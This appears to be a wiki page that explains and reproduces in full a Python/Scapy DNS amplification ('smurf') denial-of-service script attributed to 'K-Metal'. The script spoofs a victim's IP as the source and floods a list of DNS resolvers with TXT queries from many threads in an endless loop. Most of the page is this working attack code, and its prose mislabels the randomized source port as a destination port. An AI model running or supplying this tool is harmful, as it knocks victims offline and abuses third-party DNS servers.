DoS/DNSSmurf
From charlesreid1
Tool: dnssmurf
Found a DNS smurf tool from K-Metal on pastebin: http://pastebin.com/gTxRQuFY
Here's how it works:
- Read in a list of DNS servers
- Start a large thread pool
- With each thread in the pool, run the attack function
The attack function works as follows:
- Loop over entire list of DNS servers
- Send a crafted DNS request to each server
The real money shot is here: the use of Scapy to craft the DNS request:
p=IP(dst=List[count],src=host) u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query send(p/u,verbose=0)
It's sending a UDP over IP packet to one of the DNS servers found in the file, and setting it to look like it came from the sheep. The DNS packet is sent to port 53, and a random destination port is set. The DNS request is for "goo.gl".
This is simply run repeatedly, ad infinitum, by as many servers and threads as you'd like, with as many DNS servers as you'd like.
dnssmurf.py:
#!/usr/bin/env python
######################
# DNS AMP dos attack #
# by K-Metal #
######################
from scapy.all import *
import threading, sys, random, time
#Proof of Concept
if len(sys.argv) < 2: #Print Help
print "Usage: "+sys.argv[0]+" <ip> <list> <threads>"
sys.exit()
host = sys.argv[1] #Variables
File = sys.argv[2]
numthreads = int(sys.argv[3])
threads = []
with open(File) as f: #Read list
List = f.readlines()
Max = len(List) #Max length of the list
def flood():
global host
global List
global Max
print "Flooding..."
while True:
count = 0
while count < Max:
p=IP(dst=List[count],src=host)
u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
send(p/u,verbose=0)
for n in range(numthreads): #Multi-threading
t = threading.Thread(target=flood)
t.daemon = True
t.start()
threads.append(t)
while True: #So CTRL+C kills all threads
time.sleep(1)